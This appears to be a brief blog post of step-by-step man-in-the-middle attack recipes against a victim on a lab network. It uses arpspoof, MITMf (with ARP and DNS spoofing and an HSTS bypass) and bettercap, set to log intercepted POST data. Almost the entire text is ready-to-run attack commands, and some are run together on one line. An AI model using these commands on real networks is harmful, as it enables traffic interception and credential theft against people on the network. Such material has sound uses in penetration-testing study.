Attacker: 172.16.1.10
Victim: 172.16.1.20
Router: 172.16.1.1
Arpspoof method:
First enable forwarding on the attacking system.
echo '1' > /proc/sys/net/ipv4/ip_forward
Poison the ARP table of the router to tell it that you are the victim.
arpspoof -i eth0 172.16.1.20 172.16.1.1
Poison the ARP table of the victim to tell it that you are the router.
arpspoof -i eth0 -t 172.16.1.1 172.16.1.20
Use tcpdump to confirm results.
tcpdump -nni eth0 host 172.16.1.20
MITMf Method:
First enable forwarding on the attacking system.
echo '1' > /proc/sys/net/ipv4/ip_forward
Install prereqs.
apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcapstone3 libcapstone-dev libffi-dev file
Clone.
git clone https://github.com/byt3bl33d3r/MITMf
Install.
cd MITMf && git submodule init && git submodule update --recursive pip install -r requirements.txt
Run and test it out.
python mitmf.py -i eth0 --spoof --dns --hsts --arp --target 172.16.1.20 --gateway 172.16.1.1
Bettercap method:
Install.
apt-get update apt-get install build-essential ruby-dev libpcap-dev bettercap
Run it.
bettercap -T 172.16.1.20 --proxy -P POST -O bettercap.log
0 Comments